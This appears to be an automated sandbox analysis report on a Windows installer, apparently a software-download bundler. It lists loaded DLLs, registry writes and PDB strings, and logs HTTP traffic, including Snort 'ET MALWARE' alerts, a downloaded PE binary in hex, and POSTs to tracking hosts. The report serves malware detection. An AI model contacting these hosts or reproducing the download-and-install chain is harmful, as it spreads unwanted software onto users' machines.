Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\utilities.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\ucrtbase.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: WINMMBASE.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\API-MS-Win-core-xstate-l2-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-fibers-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-environment-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-datetime-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\soui3.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: ntshrui.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-interlocked-l1-1-0.dllJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeDLL: winbrand.dll
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-handle-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\DuiLib.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\imgdecoder-gdip.dllJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLServer.exeDLL: USERENV.dll
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: webio.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\msvcp120.dllJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeDLL: DPAPI.DLL
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-profile-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-convert-l1-1-0.dllJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeDLL: DEVRTL.dll
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeDLL: IPHLPAPI.DLL
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-util-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-locale-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-runtime-l1-1-0.dllJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLServer.exeDLL: iertutil.dll
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-console-l1-2-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: UxTheme.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-filesystem-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-heap-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: DWrite.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-namedpipe-l1-1-0.dllJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLServer.exeDLL: WTSAPI32.dll
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\libcrypto-1_1.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-console-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\soui-sys-resource.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-process-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-stdio-l1-1-0.dllJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeDLL: CRYPTSP.dll
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-debug-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\render-skia.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-math-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-errorhandling-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\zlib1.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-localization-l1-2-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-timezone-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: winnlsres.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-sysinfo-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-processthreads-l1-1-1.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-private-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\libcurl.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-file-l2-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-time-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-synch-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\resprovider-zip.dllJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeDLL: MSIMG32.dll
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: PROPSYS.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-multibyte-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: Msftedit.dllJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeDLL: VERSION.dll
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: cscapi.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\CrashRpt.dllJump to behavior
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeDLL: Cabinet.dll
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-libraryloader-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-conio-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-utility-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\msvcr120.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\zlibwapi.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\concrt140.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-crt-string-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\libqpdf.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: OLEACC.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: CoreMessaging.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-file-l1-1-0.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\msvcp140.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: WindowsCodecs.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: CLDAPI.dllJump to behavior
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeDLL: C:\Users\user\AppData\Local\winManager\api-ms-win-core-synch-l1-2-0.dllJump to behavior
Source: unknownHTTPS traffic detected: 113.142.34.181:443 -> 192.168.2.3:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.192.108.19:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeRegistry value created: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\winManagerJump to behavior
Source: _____NCM______2_10042231.exeStatic PE information: certificate valid
Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 00000012.00000002.778552460.00007FFC1B351000.00000020.00000001.01000000.0000001A.sdmp
Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 00000012.00000002.778552460.00007FFC1B351000.00000020.00000001.01000000.0000001A.sdmp
Source: Binary string: E:\UIDownloader\bin\Release\setup_1_237148.pdb source: _____NCM______2_10042231.exe, 00000000.00000000.369683496.0000000000811000.00000002.00000001.01000000.00000003.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 -D_USING_V110_SDK71_ source: _____NCM______2_10042231.exe, 00000000.00000000.369683496.0000000000811000.00000002.00000001.01000000.00000003.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\FLManager\temp\Link\FLManager\Release\winManager.pdb source: _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: F:\cpp\vcpkg\buildtrees\zlib\x86-windows-rel\zlib.pdb## source: _____NCM______2_10042231.exe, 00000000.00000003.618841166.000000000F530000.00000004.00001000.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: F:\cpp\vcpkg\buildtrees\zlib\x86-windows-rel\zlib.pdb source: _____NCM______2_10042231.exe, 00000000.00000003.618841166.000000000F530000.00000004.00001000.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\UIDownloader\bin\Release\Kernel.pdb source: _____NCM______2_10042231.exe, 00000000.00000003.420609026.0000000001A2D000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.661196321.0000000001A2F000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.373955181.0000000001A2D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: eex.pdb source: explorer.exe, 00000012.00000002.778552460.00007FFC1B351000.00000020.00000001.01000000.0000001A.sdmp
Source: Binary string: ?..\..\crypto\stack\stack.ccompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 -D_USING_V110_SDK71_..\..\crypto\ex_data.c source: _____NCM______2_10042231.exe, 00000000.00000000.369683496.0000000000811000.00000002.00000001.01000000.00000003.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\work\MAS_Debug\Temp\Link\WinLead\Release\WinLead.pdb source: _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\_____NCM______2_10042231.exeCode function: 0_3_1000B11C FindFirstFileExA,0_3_1000B11C
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_0016CB90 memset,GetModuleFileNameW,PathRemoveFileSpecW,memcpy,_invalid_parameter_noinfo_noreturn,memcpy,FindFirstFileW,_invalid_parameter_noinfo_noreturn,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,23_2_0016CB90
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_00184D00 GetFileAttributesW,GetLastError,FindFirstFileW,FindClose,23_2_00184D00

Networking

barindex
Source: TrafficSnort IDS: 2007929 ET MALWARE User-Agent (User-Agent Mozilla/4.0 (compatible )) 192.168.2.3:49740 -> 123.57.49.36:80
Source: TrafficSnort IDS: 2007929 ET MALWARE User-Agent (User-Agent Mozilla/4.0 (compatible )) 192.168.2.3:49744 -> 123.57.49.36:80
Source: TrafficSnort IDS: 2007929 ET MALWARE User-Agent (User-Agent Mozilla/4.0 (compatible )) 192.168.2.3:49751 -> 218.12.76.158:80
Source: TrafficSnort IDS: 2007929 ET MALWARE User-Agent (User-Agent Mozilla/4.0 (compatible )) 192.168.2.3:49750 -> 218.12.76.158:80
Source: TrafficSnort IDS: 2007929 ET MALWARE User-Agent (User-Agent Mozilla/4.0 (compatible )) 192.168.2.3:49752 -> 123.57.49.36:80
Source: TrafficSnort IDS: 2007929 ET MALWARE User-Agent (User-Agent Mozilla/4.0 (compatible )) 192.168.2.3:49756 -> 60.205.148.178:80
Source: TrafficSnort IDS: 2007929 ET MALWARE User-Agent (User-Agent Mozilla/4.0 (compatible )) 192.168.2.3:49761 -> 60.205.148.178:80
Source: TrafficSnort IDS: 2007929 ET MALWARE User-Agent (User-Agent Mozilla/4.0 (compatible )) 192.168.2.3:49762 -> 43.159.200.212:80
Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /wsin/think?ipartner=3112701&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&mid=b8a4400180ee20f44982cb4d73d6fcd7&rand=129489&timestamp=1691200180&ver=3.0.0.2253&sign=674ed7833112441346026e4e45978c4c HTTP/1.1Host: inf.safe.360.cnAccept: */*Pragma: no-cacheCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /wsin/think?ipartner=3112701&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&mid=b8a4400180ee20f44982cb4d73d6fcd7&rand=129489&timestamp=1691200180&ver=3.0.0.2253&sign=674ed7833112441346026e4e45978c4c HTTP/1.1Host: inf.safe.360.cnAccept: */*Pragma: no-cacheCache-Control: no-cache
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 04 Aug 2023 16:49:25 GMTContent-Type: binary/octet-streamContent-Length: 820128Connection: keep-aliveServer: openrestyx-reserved: amazon, aws and amazon web services are trademarks or registered trademarks of Amazon Technologies, IncCloudServiceDiscount: CDNx-amz-request-id: 0000018899BA0FEF84CB3FD9EF26105BETag: "5ed59ac24c1047a8b533c6c06ecbc40f"Last-Modified: Fri, 19 Aug 2022 07:54:44 GMTx-amz-id-2: 32AAAQAAEAABAAAQAAEAABAAAQAAEAABCS0Dy6yqoVg/8VeTVP6huttuSSPAd+Ynvia: CHN-HEshijiazhuang-AREACUCC1-CACHE35[5],CHN-HEshijiazhuang-AREACUCC1-CACHE49[0,TCP_HIT,4],CHN-TJ-GLOBAL1-CACHE18[7],CHN-TJ-GLOBAL1-CACHE104[0,TCP_HIT,3]x-hcs-proxy-type: 1X-CCDN-CacheTTL: 2592000nginx-hit: 1Age: 4961476X-CCDN-Expires: 222525Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e7 b7 49 2f a3 d6 27 7c a3 d6 27 7c a3 d6 27 7c 1e 99 b1 7c ab d6 27 7c aa ae b2 7c bc d6 27 7c aa ae a4 7c af d7 27 7c aa ae a3 7c ff d6 27 7c 84 10 4a 7c a1 d6 27 7c a3 d6 26 7c 30 d7 27 7c 84 10 5c 7c 86 d6 27 7c aa ae ad 7c e2 d6 27 7c aa ae b5 7c a2 d6 27 7c bd 84 b3 7c a2 d6 27 7c aa ae b6 7c a2 d6 27 7c 52 69 63 68 a3 d6 27 7c 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 ad 33 fb 62 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 00 82 08 00 00 b2 03 00 00 00 00 00 63 1b 04 00 00 10 00 00 00 a0 08 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 0c 00 00 04 00 00 06 0b 0d 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 f3 09 00 5c 00 00 00 98 d2 09 00 7c 01 00 00 00 c0 0a 00 20 9d 01 00 00 00 00 00 00 00 00 00 98 3a 0c 00 08 49 00 00 00 60 0c 00 0c 58 00 00 90 a6 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 9e 09 00 18 00 00 00 70 9e 09 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 08 00 f8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$I/'|'|'||'||'||'||'|J|'|&|0'|\|'||'||'||'||'|Rich'|PEL3b!c@\| :I`Xp@
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 04 Aug 2023 16:49:25 GMTContent-Type: binary/octet-streamContent-Length: 820128Connection: keep-aliveServer: openrestyx-reserved: amazon, aws and amazon web services are trademarks or registered trademarks of Amazon Technologies, IncCloudServiceDiscount: CDNx-amz-request-id: 0000018899BA0FEF84CB3FD9EF26105BETag: "5ed59ac24c1047a8b533c6c06ecbc40f"Last-Modified: Fri, 19 Aug 2022 07:54:44 GMTx-amz-id-2: 32AAAQAAEAABAAAQAAEAABAAAQAAEAABCS0Dy6yqoVg/8VeTVP6huttuSSPAd+Ynvia: CHN-HEshijiazhuang-AREACUCC1-CACHE35[5],CHN-HEshijiazhuang-AREACUCC1-CACHE49[0,TCP_HIT,4],CHN-TJ-GLOBAL1-CACHE18[7],CHN-TJ-GLOBAL1-CACHE104[0,TCP_HIT,3]x-hcs-proxy-type: 1X-CCDN-CacheTTL: 2592000nginx-hit: 1Age: 4961476X-CCDN-Expires: 222525Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e7 b7 49 2f a3 d6 27 7c a3 d6 27 7c a3 d6 27 7c 1e 99 b1 7c ab d6 27 7c aa ae b2 7c bc d6 27 7c aa ae a4 7c af d7 27 7c aa ae a3 7c ff d6 27 7c 84 10 4a 7c a1 d6 27 7c a3 d6 26 7c 30 d7 27 7c 84 10 5c 7c 86 d6 27 7c aa ae ad 7c e2 d6 27 7c aa ae b5 7c a2 d6 27 7c bd 84 b3 7c a2 d6 27 7c aa ae b6 7c a2 d6 27 7c 52 69 63 68 a3 d6 27 7c 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 ad 33 fb 62 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 00 82 08 00 00 b2 03 00 00 00 00 00 63 1b 04 00 00 10 00 00 00 a0 08 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 0c 00 00 04 00 00 06 0b 0d 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 f3 09 00 5c 00 00 00 98 d2 09 00 7c 01 00 00 00 c0 0a 00 20 9d 01 00 00 00 00 00 00 00 00 00 98 3a 0c 00 08 49 00 00 00 60 0c 00 0c 58 00 00 90 a6 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 9e 09 00 18 00 00 00 70 9e 09 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 08 00 f8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$I/'|'|'||'||'||'||'|J|'|&|0'|\|'||'||'||'||'|Rich'|PEL3b!c@\| :I`Xp@
Source: global trafficHTTP traffic detected: GET /api/ryapi?webid=2&softid=10042231&token=f4c629206dca1541c85c21d5d30ac4c7 HTTP/1.1Cache-Control: no-storeConnection: Keep-AliveExpires: 0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36Host: www.onlinedown.net
Source: global trafficHTTP traffic detected: GET /download/202201/084735-61d4eaa756820.jpg HTTP/1.1Host: img.onlinedown.netAccept: */*Accept-Encoding: deflate, gzipReferer: https://www.onlinedown.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36
Source: global trafficHTTP traffic detected: HEAD /iopdfbhjl/10042231?module=download&t=website&v=20230805004821 HTTP/1.1Host: www.onlinedown.netAccept: */*Accept-Encoding: deflate, gzipReferer: https://www.onlinedown.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36
Source: global trafficHTTP traffic detected: HEAD /down/2022down/1/05/wyyyyncmwjzh.rar?timestamp=64cd2bdd&auth_key=711023fa949fb7fcd92687a16aff0b79 HTTP/1.1Host: download.ihsdus.cnAccept: */*Accept-Encoding: deflate, gzipReferer: https://www.onlinedown.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36
Source: global trafficHTTP traffic detected: HEAD /down/2022down/1/05/wyyyyncmwjzh.rar?timestamp=64cd2bdd&auth_key=711023fa949fb7fcd92687a16aff0b79 HTTP/1.1Host: download.ihsdus.cnAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36
Source: global trafficHTTP traffic detected: GET /down/2022down/1/05/wyyyyncmwjzh.rar?timestamp=64cd2bdd&auth_key=711023fa949fb7fcd92687a16aff0b79 HTTP/1.1Host: download.ihsdus.cnUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36Accept: */*Referer: https://www.onlinedown.net/
Source: global trafficHTTP traffic detected: GET /log/client/site_soft?Action=open&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelCode=2&Ver=1.0.7.17&OsVer=10.0&Sdsoft=0&Softid=10042231&Filename=_____NCM______2_10042231.exe&Checks=1&Err=0 HTTP/1.1Cache-Control: no-storeConnection: Keep-AliveExpires: 0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36Host: api.flmgr.net
Source: global trafficHTTP traffic detected: POST /v1/client/configs HTTP/1.1Connection: Keep-AliveProxy-Connection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/plain, application/xhtml+xmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36Content-Length: 216Host: api.flmgr.net
Source: global trafficHTTP traffic detected: POST /api/info HTTP/1.1Connection: Keep-AliveProxy-Connection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/plain, application/xhtml+xmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36Content-Length: 216Host: api.nasyeo.com
Source: global trafficHTTP traffic detected: POST /log/next HTTP/1.1Connection: Keep-AliveProxy-Connection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: textPOST, application/xhtml+xmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36Content-Length: 328Host: api.nasyeo.com
